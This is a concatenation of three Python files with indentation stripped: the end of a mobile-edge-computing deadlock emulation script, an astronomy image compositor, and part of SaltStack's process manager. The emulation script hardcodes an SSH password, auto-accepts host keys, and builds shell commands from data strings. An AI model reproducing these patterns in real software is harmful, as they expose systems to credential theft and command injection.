# send_client({da[1]: get_time()}, offload_register[da[1]]) # send back to client
if da[1] in task_record:
del task_record[da[1]]
task_new = '.'.join(da[1].split('.')[:-1])
_client.publish(da[1].split('.')[2], str({task_new: get_time()+['mec']}), )
count_task_sent(da[1])
cooperate['mec'] += 1
else:
print('*'*30 + f'\n{da[1]} Not in Task Record\n' + '*'*30)
elif (address[0] not in ip_set) and (da[0] == 'ex') and (da[1] == node_id):
_received = ast.literal_eval(da[2] + da[3])
shared_resource_lock.acquire()
task = _received[0] + '*{}'.format(t_track)
reoffload_list[0].append(task)
reoffload_list[1][task] = _received[1]
shared_resource_lock.release()
t_track += 1
_inward_mec += 1
def call_execute_re_offload():
global reoffload_list, outward_mec
global offload_check
while True:
if stop == 1:
print('Stopped: call_execute_re_offload()')
break
else:
if len(reoffload_list[0]) == 1:
t = reoffload_list[0][-1]
time.sleep(reoffload_list[1][t] / 2)
shared_resource_lock.acquire()
reoffload_list[0].remove(t)
del reoffload_list[1][t]
shared_resource_lock.release()
send_offloaded_task_mec('{} {}'.format(t.split('.')[1], t.split('*')[0]))
outward_mec += 1
offload_check[0] += 1
elif len(reoffload_list[0]) > 1:
o = reoffload_list.copy()
offload_check[1] += len(o)
execute_re_offloaded_task(o)
for i in o[0]:
shared_resource_lock.acquire()
reoffload_list[0].remove(i)
del reoffload_list[1][i]
shared_resource_lock.release()
def send_email(msg):
try:
server = smtplib.SMTP_SSL('smtp.gmail.com')
server.ehlo()
server.login(config.email_address, config.password)
subject = 'Deadlock results rms+bankers {}'.format(get_hostname())
# msg = 'Attendance done for {}'.format(_timer)
_message = 'Subject: {}\n\n{}\n\n SENT BY RIHANNA \n\n'.format(subject, msg)
server.sendmail(config.email_address, config.send_email, _message)
server.quit()
print("Email sent!")
except Exception as e:
print(e)
def send_offloaded_task_mec(msg):
_multicast_group = ('224.5.5.55', 20000)
try:
sock2.sendto(str.encode(msg), _multicast_group)
except Exception as e:
print(e)
def send_result(host_, data):
try:
c = paramiko.SSHClient()
un = 'mec'
pw = 'password'
s_port = 22
c.set_missing_host_key_policy(paramiko.AutoAddPolicy())
c.connect(host_, s_port, un, pw)
for i in data:
cmd = ('echo "{}" >> /home/mec/result/data.py'.format(i)) # task share : host ip task
stdin, stdout, stderr = c.exec_command(cmd)
c.close()
except Exception as e:
print(e)
def mec_id(client_ip):
_id = client_ip.split('.')[-1]
if len(_id) == 1:
return '00' + _id
elif len(_id) == 2:
return '0' + _id
else:
return _id
def run_me():
global discovering
initialization()
while True:
if len(hosts) == mec_no:
print('MEC Details: ', hosts)
del hosts['speaker']
discovering = 1
break
time.sleep(2)
speak = Thread(target=speaking_node)
thread_record.append(speak)
speak.daemon = True
speak.start()
start_loop()
def save_and_email():
_id_ = get_hostname()[-1]
result = f"\nwt{_id_}_2_{mec_no} = {mec_waiting_time} " \
f"\nrtt{_id_}_2_{mec_no} = {mec_rtt} \ncpu{_id_}_2_{mec_no} = {_cpu} " \
f"\noff_mec{_id_}_2_{mec_no} = {_off_mec} " \
f"\noff_cloud{_id_}_2_{mec_no} = {_off_cloud} " \
f"\ninward_mec{_id_}_2_{mec_no} = {_inward_mec}" \
f"\nloc{_id_}_2_{mec_no} = {_loc} " \
f"\ndeadlock{_id_}_2_{mec_no} = {deadlock} \nmemory{_id_}_2_{mec_no} = {memory}" \
f"\ntask_received = {total_received_task} \nsent_t = {clients_record}" \
f"\ncooperate{_id_}_2_{mec_no} = {cooperate} \ntask_record{_id_}_2_{mec_no} = {task_record}" \
f"\noutward_mec{_id_}_2_{mec_no} = {outward_mec}" \
f"\noffload_check{_id_}_2_{mec_no} = {offload_check}" \
f"\ntimed_out_tasks{_id_}_2_{mec_no} = {timed_out_tasks}\n"
list_result = [
f"\nwt{_id_}_2_{mec_no} = {mec_waiting_time} ",
f"\nrtt{_id_}_2_{mec_no} = {mec_rtt} \ncpu{_id_}_2_{mec_no} = {_cpu} ",
f"\noff_mec{_id_}_2_{mec_no} = {_off_mec} \noff_cloud{_id_}_2_{mec_no} = {_off_cloud} ",
f"\ninward_mec{_id_}_2_{mec_no} = {_inward_mec}",
f"\nloc{_id_}_2_{mec_no} = {_loc} ",
f"\ndeadlock{_id_}_2_{mec_no} = {deadlock} \nmemory{_id_}_2_{mec_no} = {memory}",
f"\ntask_received{_id_}_2_{mec_no} = {total_received_task} \nsent_t{_id_}_2_{mec_no} = {clients_record}",
f"\ncooperate{_id_}_2_{mec_no} = {cooperate} \ntask_record{_id_}_2_{mec_no} = {task_record} "
f"\noutward_mec{_id_}_2_{mec_no} = {outward_mec}",
f"\noffload_check{_id_}_2_{mec_no} = {offload_check}",
f"\ntimed_out_tasks{_id_}_2_{mec_no} = {timed_out_tasks}"
]
path_ = 'data/raw/'
if os.path.exists(path_):
cmd = f"echo '' > {path_}{_id_}_2_{mec_no}datal.py"
os.system(cmd)
cmd = f"echo '' > {path_}{_id_}_2_{mec_no}datap.py"
os.system(cmd)
else:
os.mkdir(path_)
cmd = f"echo '' > {path_}{_id_}_2_{mec_no}datal.py"
os.system(cmd)
cmd = f"echo '' > {path_}{_id_}_2_{mec_no}datap.py"
os.system(cmd)
file_ = open(f'{path_}{_id_}_2_{mec_no}datap.py', 'w')
for i in list_result:
cmd = f'echo "{i}" >> {path_}{_id_}_2_{mec_no}datal.py'
file_.write(i)
os.system(cmd)
file_.close()
sp.run(
["scp", f"{path_}{_id_}_2_{mec_no}datap.py", f"mec@{hosts['osboxes-0']}:/home/mec/result/python"])
sp.run(
["scp", f"{path_}{_id_}_2_{mec_no}datal.py", f"mec@{hosts['osboxes-0']}:/home/mec/result/linux"])
send_result(hosts['osboxes-0'], list_result)
send_email(result)
if len(task_record) > 0:
for _task_ in task_record:
task_new = '.'.join(_task_.split('.')[:-1])
_client.publish(task_new.split('.')[2], str({task_new: get_time()+[task_record[_task_]]}), )
def start_loop():
global _loc
global tasks
global t_time
global node_id
global stop
print('\n============* WELCOME TO THE DEADLOCK EMULATION PROGRAM *=============\n')
node_id = mec_id(ip_address())
# print('node id: ', node_id)
_threads_ = [receive_offloaded_task_mec, call_execute_re_offload, connect_to_broker]
for i in _threads_:
Thread(target=i).daemon = True
Thread(target=i).start()
time.sleep(2)
send_message('client') # send mec details to clients
# print('algo_id: ', algo_id())
x = gp.getpass('Press any key to Start...').lower()
if x != 'exit':
print('========= Waiting for tasks ==========')
_time_ = dt.datetime.now()
while True:
try:
if len(received_task_queue) > 0:
info = received_task_queue.pop(0)
tasks, t_time = info
print('RMS List of Processes: ', tasks, '\n')
print('\n========= Running Deadlock Algorithm ===========')
lcm_result, task_load = load_tasks()
list_seq = get_exec_seq(scheduler(lcm_result, task_load))
if len(list_seq) > 0: # do only when there is a task in safe sequence
wait_list = calc_wait_time(list_seq)
print('\nWaiting Time List: ', wait_list)
compare_result = compare_local_mec(wait_list)
print('\nExecute Locally: ', compare_result[1])
_loc += len(compare_result[1]) # total number of tasks to be executed locally
print('\nExecute in MEC: ', compare_result[0])
if len(compare_result[0]) > 0:
print('\nSending to cooperative platform')
cooperative_mec(compare_result[0])
execute(compare_result[1])
generate_results()
_time_ = dt.datetime.now()
else:
send_message(str('wt {} 0.0'.format(ip_address())))
time.sleep(0.4)
now = dt.datetime.now()
delta = now - _time_
if delta > dt.timedelta(minutes=4):
print('terminating programme 3 mins elapsed')
save_and_email()
stop += 1
'''
for i in thread_record:
i.join()
'''
_client.loop_stop()
time.sleep(1)
print('done')
os.system('kill -9 {}'.format(os.getpid()))
break
except KeyboardInterrupt:
print('\nProgramme Terminated')
save_and_email()
stop += 1
'''
for i in thread_record:
i.join()
'''
_client.loop_stop()
time.sleep(1)
print('done')
os.system('kill -9 {}'.format(os.getpid()))
break
def speaking_node():
global mec_no
while True:
if len(hosts) > (mec_no - 1):
send_message('update')
mec_no = len(hosts) + 1
time.sleep(2)
def initialization():
global mec_no
global host_ip
global cloud_ip
host_ip = ip_address()
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
print('Broker IP: ', s.getsockname()[0])
try:
mec_no = int(input('Number of MECs: ').strip())
cloud_ip = input('Cloud Server IP: ').strip()
print('\nCompiling MEC Details')
h1 = Thread(target=receive_message)
h2 = Thread(target=receive_offloaded_task_mec)
h1.daemon = True
h2.daemon = True
h1.start()
h2.start()
time.sleep(1.5)
while True:
b = input('Send Hello Message (Y/N): ').strip().lower()
if b == 'y':
send_message('hello')
break
else:
print('\nPlease Type "y" to send Hello message\n')
except KeyboardInterrupt:
print('\nProgramme Terminated')
exit(0)
def main():
global algo
os.system('clear')
print('mec ip: ', ip_address())
algo = psutil.Process()
discovering_group()
offloading_group()
host_ip_set()
run_me()
if __name__ == "__main__":
main()
|
compositor.py
|
"""
The compositor module combines the different output files of the simulation.
As the simulation module outputs different files for background and foreground
and because the intensity of the blender rendered images are not constant, the
compositor is required to fix the intensity issue and add the star background.
"""
from datetime import datetime
import json
from pathlib import Path
import threading
from astropy import constants as const
from astropy import units as u
import cv2
import numpy as np
from . import utils
#Astrometric calibrations
#https://www.cfa.harvard.edu/~dfabricant/huchra/ay145/mags.html
FLUX0_VBAND = 3640 * 1.51E7 * 0.16 * u.ph / (u.s * u.m ** 2) # Photons per m^2
SUN_MAG_VBAND = -26.74 * u.mag # 1 AU distance
SUN_FLUX_VBAND_1AU = np.power(10., -0.4 * SUN_MAG_VBAND.value) * FLUX0_VBAND
class ImageCompositorError(RuntimeError):
"""This is a generic error for the compositor."""
pass
class Frame():
"""Class to wrap all data of a single frame."""
metadata = None
stars = None
sssb_only = None
sssb_const_dist = None
light_ref = None
def __init__(self,
frame_id,
image_dir=None,
stars=None,
sssb_only=None,
sssb_const_dist=None,
light_ref=None):
self.id = frame_id
if None not in (stars, sssb_only, sssb_const_dist, light_ref):
self.stars = stars
self.sssb_only = sssb_only
self.sssb_const_dist = sssb_const_dist
self.light_ref = light_ref
elif image_dir is not None:
self.read_complete_frame(self.id, image_dir)
else:
raise ImageCompositorError("Unable to create frame.")
def calc_ref_intensity(self):
"""Calculates reference intensitiy using the light reference scene."""
(height, width, _) = self.light_ref.shape
h_slice = (height // 2 - 35, height // 2 + 35)
w_slice = (width // 2 - 35, width // 2 + 35)
area = self.light_ref[h_slice[0]:h_slice[1], w_slice[0]:w_slice[1], 0]
intensities = np.mean(area)
return intensities
def calc_stars_stats(self):
"""Calculate star scene parameters."""
star_c_max = []
star_c_sum = []
for i in range(3):
star_c_max.append(np.max(self.stars[:, :, i]))
star_c_sum.append(np.sum(self.stars[:, :, i]))
return (star_c_max, star_c_sum)
def calc_sssb_stats(self, const_dist=False):
"""Calculate SSSB max and sum corrected with alpha channel.
If const_dist is True, stats of const distant images are calculated.
"""
if const_dist:
sssb_max = np.max(
self.sssb_const_dist[:, :, 0] * self.sssb_const_dist[:, :, 3])
sssb_sum = np.sum(
self.sssb_const_dist[:, :, 0] * self.sssb_const_dist[:, :, 3])
else:
sssb_max = np.max(
self.sssb_only[:, :, 0] * self.sssb_only[:, :, 3])
sssb_sum = np.sum(
self.sssb_only[:, :, 0] * self.sssb_only[:, :, 3])
return (sssb_max, sssb_sum)
def read_complete_frame(self, frame_id, image_dir):
"""Reads all images for a given frame id.
This includes Stars, SssbOnly, SssbConstDist, and LightRef.
"""
frame_fmt_str = image_dir / ("{}_" + frame_id + ".exr")
frame_fmt_str = str(frame_fmt_str)
self.metadata = self.read_meta_file(frame_id, image_dir)
filename = frame_fmt_str.format("Stars")
self.stars = utils.read_openexr_image(filename)
filename = frame_fmt_str.format("SssbOnly")
self.sssb_only = utils.read_openexr_image(filename)
filename = frame_fmt_str.format("SssbConstDist")
self.sssb_const_dist = utils.read_openexr_image(filename)
filename = frame_fmt_str.format("LightRef")
self.light_ref = utils.read_openexr_image(filename)
def read_meta_file(self, frame_id, image_dir):
"""Reads metafile of a frame."""
filename = image_dir / ("Metadata_" + frame_id + ".json")
with open(str(filename), "r") as metafile:
metadata = json.load(metafile)
date = datetime.strptime(metadata["date"], "%Y-%m-%dT%H%M%S-%f")
metadata["date"] = date
metadata["distance"] = metadata["distance"] * u.m
metadata["sc_pos"] = np.asarray(metadata["sc_pos"]) * u.m
metadata["sssb_pos"] = np.asarray(metadata["sssb_pos"]) * u.m
return metadata
class ImageCompositor():
"""This class provides functions to combine the final simulation images."""
IMG_MIN_SIZE_INFOBOX = (1200, 1000)
INFOBOX_SIZE = {"default": (400, 100), "min": (200, 50)}
def __init__(self,
res_dir,
img_dir,
instrument,
sssb,
with_infobox,
with_clipping,
ext_logger):
self.logger = ext_logger
self.res_dir = res_dir
self.image_dir = img_dir
self.image_extension = ".exr"
self._threads = []
self.inst = instrument
self.dlmult = 2
self.sssb = sssb
self.with_infobox = with_infobox
self.with_clipping = with_clipping
self.logger.debug(f"Infobox: {with_infobox}. Clip: {with_clipping}.")
def get_frame_ids(self):
"""Extract list of frame ids from file names of SssbOnly scenes."""
scene_name = "SssbOnly"
image_names = scene_name + "*" + self.image_extension
filenames = self.image_dir.glob(image_names)
ids = []
for filename in filenames:
filename = str(filename.name).strip(self.image_extension)
filename = filename.strip(scene_name)
ids.append(filename.strip("_"))
return ids
def calc_relative_intensity_curve(self):
"""Calculates the relative intensity curve for all sssb frames."""
only_stats = np.zeros(len(self.frames))
const_dist_stats = np.zeros(len(self.frames))
distances = np.zeros(len(self.frames))
for i, frame in enumerate(self.frames):
only_stats[i] = frame.calc_sssb_stats()[1]
const_dist_stats[i] = frame.calc_sssb_stats(True)[1]
distances[i] = frame.metadata["distance"]
rel_intensity = only_stats / const_dist_stats
ind_sorted = distances.argsort()
distances = distances[ind_sorted]
rel_intensity = rel_intensity[ind_sorted]
for last in range(len(distances)):
if rel_intensity[last] == 0:
break
#last -= 1
rel_intensity = rel_intensity[:last]
return rel_intensity
def compose(self, frames=None, max_threads=3):
"""
Composes different images into final image, uses multi-threading.
!!! CAUTION !!! Call only once at a time.
:type frames: String, Frame or List of Frame
:param frames: FrameID, Frame or list of frames for calibration and
composition.
:type name_suffix: str
:param name_suffix: Image suffix for file I/O. Used for constructing
file names to read different images of a frame as
well as used for composed image output.
"""
if frames is None:
self.frame_ids = self.get_frame_ids()
frames = []
for frame_id in self.frame_ids:
new_frame = Frame(frame_id, self.image_dir)
frames.append(new_frame)
elif isinstance(frames, str):
frames = [Frame(frames, self.image_dir)]
elif isinstance(frames, Frame):
frames = [frames]
elif isinstance(frames, list) and isinstance(frames[0], Frame):
pass
else:
raise ImageCompositorError(
"Compositor.compose requires frame or list of frames as input")
for frame in frames:
for thr in self._threads:
if not thr.is_alive():
self._threads.pop(self._threads.index(thr))
if len(self._threads) < max_threads - 1:
# Allow up to 2 additional threads
thr = threading.Thread(target=self._compose, args=(frame,))
thr.start()
self._threads.append(thr)
else:
# If too many, also compose in main thread to not drop a frame
self._compose(frame)
for thr in self._threads:
thr.join()
def _compose(self, frame):
"""
Composes raw images and adjusts light intensities.
:type frame: Frame
:param frame: Frame containing necessary inormation for composition.
"""
# Calculate Gaussian standard deviation for approx diffraction pattern
sigma = (self.dlmult * 0.45 * self.inst.wavelength
* self.inst.focal_l / (self.inst.aperture_d
* self.inst.pix_l))
# SSSB photometry
sc_sun_dist = np.linalg.norm(frame.metadata["sc_pos"]) * u.m
ref_flux = SUN_FLUX_VBAND_1AU * ((const.au / sc_sun_dist) ** 2)
ref_flux *= self.inst.aperture_a * self.inst.pix_a
ref_flux /= ((self.inst.focal_l ** 2) * np.pi)
ref_flux = ref_flux.decompose()
# Star photometry
starmap_flux = FLUX0_VBAND * frame.metadata["total_flux"]
starmap_flux *= self.inst.aperture_a
starmap_flux = starmap_flux.decompose()
# Calibrate starmap
(_, stars_sums) = frame.calc_stars_stats()
frame.stars[:, :, 0:3] *= starmap_flux.value / stars_sums[0]
# Create composition image array
composed_img = np.zeros(frame.stars.shape, dtype=np.float32)
# Calibrate SSSB, depending on visible size
dist_scale = np.power(1E6 * u.m / frame.metadata["distance"], 2.)
vis_dim = self.sssb["max_dim"] * dist_scale
# Kernel size calculated to equal skimage.filters.gaussian
# Reference:
# https://github.com/scipy/scipy/blob/4bfc152f6ee1ca48c73c06e27f7ef021d729f496/scipy/ndimage/filters.py#L214
kernel = int((4 * sigma + 0.5) * 2)
kernel = max(kernel, 5) # Don't use smaller than 5
ksize = (kernel, kernel)
if vis_dim < 0.1:
# Use point source sssb
# Generate point source reference image
sssb_ref = self.create_sssb_ref(self.inst.res)
alpha = frame.sssb_const_dist[:, :, 3]
scale = frame.sssb_const_dist[:, :, 0:3] * alpha
sssb_ref[:, :, 0:3] *= np.sum(scale, axis=-1) * dist_scale
composed_img = (sssb_ref[:, : , 0:3] + frame.stars)
composed_img *= self.inst.quantum_eff
composed_img = cv2.GaussianBlur(composed_img, ksize, sigma)
composed_img += np.random.poisson(composed_img)
composed_max = np.max(composed_img)
ref_sssb_max = np.max(sssb_ref[:, :, 0:3])
if composed_max > ref_sssb_max * 5:
composed_max = ref_sssb_max * 5
else:
# Calibrate sssb images
ref_int = frame.calc_ref_intensity()
sssb_cal_factor = ref_flux * self.sssb["albedo"] / ref_int
sssb_cal_factor = sssb_cal_factor.decompose().value
frame.sssb_only[:, :, 0:3] *= sssb_cal_factor
frame.sssb_const_dist[:, :, 0:3] *= sssb_cal_factor
# Merge images taking alpha channel and q.e. into account
alpha = frame.sssb_only[:, :, 3]
for c in range(3):
sssb = frame.sssb_only[:, :, c]
stars = frame.stars[:, :, c]
composed_img[:, :, c] = alpha * sssb + (1 - alpha) * stars
composed_img[:, :, 0:3] *= self.inst.quantum_eff
composed_img = cv2.GaussianBlur(composed_img, ksize, sigma)
composed_img += np.random.poisson(composed_img)
composed_max = np.max(composed_img)
composed_img[:, :, :] /= composed_max
if self.with_infobox:
infobox_img = composed_img[:, :, 0:3] * 255
infobox_img = infobox_img.astype(np.uint8)
try:
self.add_infobox(infobox_img, frame.metadata)
except ImageCompositorError as e:
self.logger.debug(f"No Infobox could be added. {str(e)}!")
filename = self.res_dir / ("Comp_" + str(frame.id) + ".png")
cv2.imwrite(str(filename), infobox_img)
exrfile = self.image_dir / ("Comp_" + str(frame.id))
else:
exrfile = self.res_dir / ("Comp_" + str(frame.id))
if self.with_clipping:
clipped_img = self.clip_color_depth(composed_img)
filename = self.res_dir / ("Inst_" + str(frame.id) + ".png")
cv2.imwrite(str(filename), clipped_img)
rel_pos = frame.metadata["sc_pos"] - frame.metadata["sssb_pos"]
rel_pos = rel_pos.value / 1000.
filename = str(filename) + ".xyz"
with open(str(filename), "w") as priorfile:
priorfile.write(f"{rel_pos[0]} {rel_pos[1]} {rel_pos[2]}")
exrfile = self.image_dir / ("Comp_" + str(frame.id))
else:
exrfile = self.res_dir / ("Comp_" + str(frame.id))
utils.write_openexr_image(exrfile, composed_img)
def create_sssb_ref(self, res, scale=5):
"""Creates a reference sssb image for calibration.
Sort of natural look by using image increased by factor of scale,
gaussian blur the result and decimate to match size of other images.
opencv resize algorithm needs integer divisable number of pixels
to have the same behaviour as skimage.transform.downscale_local_mean.
Zero-padding of skimage.transform.downscale_local_mean would be
necessary without scaling.
"""
res_x, res_y = res
# Rescale
res_x_sc = res_x * scale
res_y_sc = res_y * scale
sssb_point = np.zeros((res_x_sc, res_y_sc, 4), np.float32)
sig = scale / 2.
kernel = int((4 * sig + 0.5) * 2)
ksize = (kernel, kernel)
# Create point source and blur
sssb_point[res_x_sc//2, res_y_sc//2, :] = [1., 1., 1., 1.]
sssb_point = cv2.GaussianBlur(sssb_point, ksize, sig)
sssb = np.zeros((res_x, res_y, 4), np.float32)
sssb = cv2.resize(sssb_point, None, fx=1/scale, fy=1/scale,
interpolation=cv2.INTER_AREA)
sssb *= (scale * scale)
sssb[:, :, 0:3] /= np.sum(sssb[:, :, 0:3])
return sssb
def add_infobox(self, img, metadata, height=None, width=None):
"""Overlays an infobox to a given image in the lower right corner."""
# ~ Smallest size 1000 1200 for which 100 400 works
y_res, x_res, _ = img.shape
if height is None:
if y_res > self.IMG_MIN_SIZE_INFOBOX[1]:
height = self.INFOBOX_SIZE["default"][1]
else:
scale = y_res / self.IMG_MIN_SIZE_INFOBOX[1]
height = scale * self.INFOBOX_SIZE["default"][1]
height = int(np.ceil(height))
if width is None:
if x_res > self.IMG_MIN_SIZE_INFOBOX[0]:
width = self.INFOBOX_SIZE["default"][0]
else:
scale = x_res / self.IMG_MIN_SIZE_INFOBOX[0]
width = scale * self.INFOBOX_SIZE["default"][0]
width = int(np.ceil(width))
if height is not None or width is not None:
if height > y_res or width > x_res:
raise ImageCompositorError("Infobox is bigger than image.")
elif (height < self.INFOBOX_SIZE["min"][0] or
width < self.INFOBOX_SIZE["min"][1]):
raise ImageCompositorError("Infobox is too small to read.")
sig = 3
textbox = np.zeros((height * sig, width * sig, 4), np.float32)
pt1 = (0, 0)
pt2 = (width * sig, height * sig)
color = (128, 128, 128, 128)
cv2.rectangle(textbox, pt1, pt2, color, cv2.FILLED)
org_date = (10 * sig, 40 * sig)
org_dist = (10 * sig, 70 * sig)
font = cv2.FONT_HERSHEY_COMPLEX_SMALL
font_size = 1.0 * sig
color = (255, 255, 255, 255)
date = str(metadata["date"])
dist = str(metadata["distance"])
cv2.putText(textbox, date, org_date, font, font_size, color, sig)
cv2.putText(textbox, dist, org_dist, font, font_size, color, sig)
# See link above for explanation
sigma = sig / 2.
kernel = int((4 * sigma + 0.5) * 2)
ksize = (kernel, kernel)
textbox = cv2.GaussianBlur(textbox, ksize, sigma)
textbox = cv2.resize(textbox, (width, height),
interpolation=cv2.INTER_AREA)
alpha_s = textbox[:, :, 3] / 255.0
alpha_l = 1. - alpha_s
for c in range(3):
tb_a = alpha_s * textbox[:, :, c]
img_a = alpha_l * img[y_res-height:y_res+1, x_res-width:x_res+1, c]
img_channel = (tb_a + img_a)
img[y_res-height:y_res+1, x_res-width:x_res+1, c] = img_channel
return img
def clip_color_depth(self, img):
"""Reduces color depth to the instrument color depth."""
max_val = int(2 ** self.inst.color_depth - 1)
if max_val <= 255:
img = img[:, :, 0:3] * max_val
img = img.astype(np.uint8)
else:
img = img[:, :, 0:3] * max_val
img = img.astype(np.uint16)
img = np.asarray(img * (65535. / max_val), np.float32)
img = img.astype(np.uint16)
return img
if __name__ == "__main__":
pass
|
process.py
|
# -*- coding: utf-8 -*-
# Import python libs
from __future__ import absolute_import, with_statement
import copy
import os
import sys
import time
import errno
import types
import signal
import logging
import threading
import contextlib
import subprocess
import multiprocessing
import multiprocessing.util
# Import salt libs
import salt.defaults.exitcodes
import salt.utils
import salt.log.setup
import salt.defaults.exitcodes
from salt.log.mixins import NewStyleClassMixIn
# Import 3rd-party libs
import salt.ext.six as six
from salt.ext.six.moves import queue, range # pylint: disable=import-error,redefined-builtin
from tornado import gen
log = logging.getLogger(__name__)
# pylint: disable=import-error
HAS_PSUTIL = False
try:
import psutil
HAS_PSUTIL = True
except ImportError:
pass
def systemd_notify_call(action):
process = subprocess.Popen(['systemd-notify', action], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
process.communicate()
status = process.poll()
return status == 0
def notify_systemd():
'''
Notify systemd that this process has started
'''
try:
import systemd.daemon
except ImportError:
if salt.utils.which('systemd-notify') and systemd_notify_call('--booted'):
return systemd_notify_call('--ready')
return False
if systemd.daemon.booted():
try:
return systemd.daemon.notify('READY=1')
except SystemError:
# Daemon was not started by systemd
pass
def set_pidfile(pidfile, user):
'''
Save the pidfile
'''
pdir = os.path.dirname(pidfile)
if not os.path.isdir(pdir) and pdir:
os.makedirs(pdir)
try:
with salt.utils.fopen(pidfile, 'w+') as ofile:
ofile.write(str(os.getpid()))
except IOError:
pass
log.debug(('Created pidfile: {0}').format(pidfile))
if salt.utils.is_windows():
return True
import pwd # after confirming not running Windows
#import grp
try:
pwnam = pwd.getpwnam(user)
uid = pwnam[2]
gid = pwnam[3]
#groups = [g.gr_gid for g in grp.getgrall() if user in g.gr_mem]
except IndexError:
sys.stderr.write(
'Failed to set the pid to user: {0}. The user is not '
'available.\n'.format(
user
)
)
sys.exit(salt.defaults.exitcodes.EX_NOUSER)
if os.getuid() == uid:
# The current user already owns the pidfile. Return!
return
try:
os.chown(pidfile, uid, gid)
except OSError as err:
msg = (
'Failed to set the ownership of PID file {0} to user {1}.'.format(
pidfile, user
)
)
log.debug('{0} Traceback follows:\n'.format(msg), exc_info=True)
sys.stderr.write('{0}\n'.format(msg))
sys.exit(err.errno)
log.debug('Chowned pidfile: {0} to user: {1}'.format(pidfile, user))
def check_pidfile(pidfile):
'''
Determine if a pidfile has been written out
'''
return os.path.isfile(pidfile)
def get_pidfile(pidfile):
'''
Return the pid from a pidfile as an integer
'''
with salt.utils.fopen(pidfile) as pdf:
pid = pdf.read()
return int(pid)
def clean_proc(proc, wait_for_kill=10):
'''
Generic method for cleaning up multiprocessing procs
'''
# NoneType and other fun stuff need not apply
if not proc:
return
try:
waited = 0
while proc.is_alive():
proc.terminate()
waited += 1
time.sleep(0.1)
if proc.is_alive() and (waited >= wait_for_kill):
log.error(
'Process did not die with terminate(): {0}'.format(
proc.pid
)
)
os.kill(proc.pid, signal.SIGKILL)
except (AssertionError, AttributeError):
# Catch AssertionError when the proc is evaluated inside the child
# Catch AttributeError when the process dies between proc.is_alive()
# and proc.terminate() and turns into a NoneType
pass
def os_is_running(pid):
'''
Use OS facilities to determine if a process is running
'''
if isinstance(pid, six.string_types):
pid = int(pid)
if HAS_PSUTIL:
return psutil.pid_exists(pid)
else:
try:
os.kill(pid, 0) # SIG 0 is the "are you alive?" signal
return True
except OSError:
return False
class ThreadPool(object):
'''
This is a very VERY basic threadpool implementation
This was made instead of using multiprocessing ThreadPool because
we want to set max queue size and we want to daemonize threads (neither
is exposed in the stdlib version).
Since there isn't much use for this class as of right now this implementation
Only supports daemonized threads and will *not* return results
TODO: if this is found to be more generally useful it would be nice to pull
in the majority of code from upstream or from http://bit.ly/1wTeJtM
'''
def __init__(self,
num_threads=None,
queue_size=0):
# if no count passed, default to number of CPUs
if num_threads is None:
num_threads = multiprocessing.cpu_count()
self.num_threads = num_threads
# create a task queue of queue_size
self._job_queue = queue.Queue(queue_size)
self._workers = []
# create worker threads
for _ in range(num_threads):
thread = threading.Thread(target=self._thread_target)
thread.daemon = True
thread.start()
self._workers.append(thread)
# intentionally not called "apply_async" since we aren't keeping track of
# the return at all, if we want to make this API compatible with multiprocessing
# threadpool we can in the future, and we won't have to worry about name collision
def fire_async(self, func, args=None, kwargs=None):
if args is None:
args = []
if kwargs is None:
kwargs = {}
try:
self._job_queue.put_nowait((func, args, kwargs))
return True
except queue.Full:
return False
def _thread_target(self):
while True:
# 1s timeout so that if the parent dies this thread will die within 1s
try:
try:
func, args, kwargs = self._job_queue.get(timeout=1)
self._job_queue.task_done() # Mark the task as done once we get it
except queue.Empty:
continue
except AttributeError:
# During shutdown, `queue` may not have an `Empty` atttribute. Thusly,
# we have to catch a possible exception from our exception handler in
# order to avoid an unclean shutdown. Le sigh.
continue
try:
log.debug('ThreadPool executing func: {0} with args:{1}'
' kwargs{2}'.format(func, args, kwargs))
func(*args, **kwargs)
except Exception as err:
log.debug(err, exc_info=True)
class ProcessManager(object):
'''
A class which will manage processes that should be running
'''
def __init__(self, name=None, wait_for_kill=1):
# pid -> {tgt: foo, Process: object, args: args, kwargs: kwargs}
self._process_map = {}
self.name = name
if self.name is None:
self.name = self.__class__.__name__
self.wait_for_kill = wait_for_kill
# store some pointers for the SIGTERM handler
self._pid = os.getpid()
self._sigterm_handler = signal.getsignal(signal.SIGTERM)
self._restart_processes = True
def add_process(self, tgt, args=None, kwargs=None, name=None):
'''
Create a processes and args + kwargs
This will deterimine if it is a Process class, otherwise it assumes
it is a function
'''
if args is None:
args = []
if kwargs is None:
kwargs = {}
if salt.utils.is_windows():
# Need to ensure that 'log_queue' is correctly transfered to
# processes that inherit from 'MultiprocessingProcess'.
if type(MultiprocessingProcess) is type(tgt) and (
issubclass(tgt, MultiprocessingProcess)):
need_log_queue = True
else:
need_log_queue = False
if need_log_queue and 'log_queue' not in kwargs:
if hasattr(self, 'log_queue'):
kwargs['log_queue'] = self.log_queue
else:
kwargs['log_queue'] = (
salt.log.setup.get_multiprocessing_logging_queue())
# create a nicer name for the debug log
if name is None:
if isinstance(tgt, types.FunctionType):
name = '{0}.{1}'.format(
tgt.__module__,
tgt.__name__,
)
else:
name = '{0}{1}.{2}'.format(
tgt.__module__,
'.{0}'.format(tgt.__class__) if str(tgt.__class__) != "<type 'type'>" else '',
tgt.__name__,
)
if type(multiprocessing.Process) is type(tgt) and issubclass(tgt, multiprocessing.Process):
process = tgt(*args, **kwargs)
else:
process = multiprocessing.Process(target=tgt, args=args, kwargs=kwargs, name=name)
if isinstance(process, SignalHandlingMultiprocessingProcess):
with default_signals(signal.SIGINT, signal.SIGTERM):
process.start()
else:
process.start()
log.debug("Started '{0}' with pid {1}".format(name, process.pid))
self._process_map[process.pid] = {'tgt': tgt,
'args': args,
'kwargs': kwargs,
'Process': process}
return process
def restart_process(self, pid):
'''
Create new process (assuming this one is dead), then remove the old one
'''
log.info('Process {0} ({1}) died with exit status {2},'
' restarting...'.format(self._process_map[pid]['tgt'],
pid,
self._process_map[pid]['Process'].exitcode))
# don't block, the process is already dead
self._process_map[pid]['Process'].join(1)
self.add_process(self._process_map[pid]['tgt'],
self._process_map[pid]['args'],
self._process_map[pid]['kwargs'])
del self._process_map[pid]
def stop_restarting(self):
self._restart_processes = False
def send_signal_to_processes(self, signal):
for pid in six.iterkeys(self._process_map.copy()):
try:
os.kill(pid, signal)
except OSError as exc:
if exc.errno != errno.ESRCH:
# If it's not a "No such process" error, raise it
raise
# Otherwise, it's a dead process, remove it from the process map
del self._process_map[pid]
@gen.coroutine
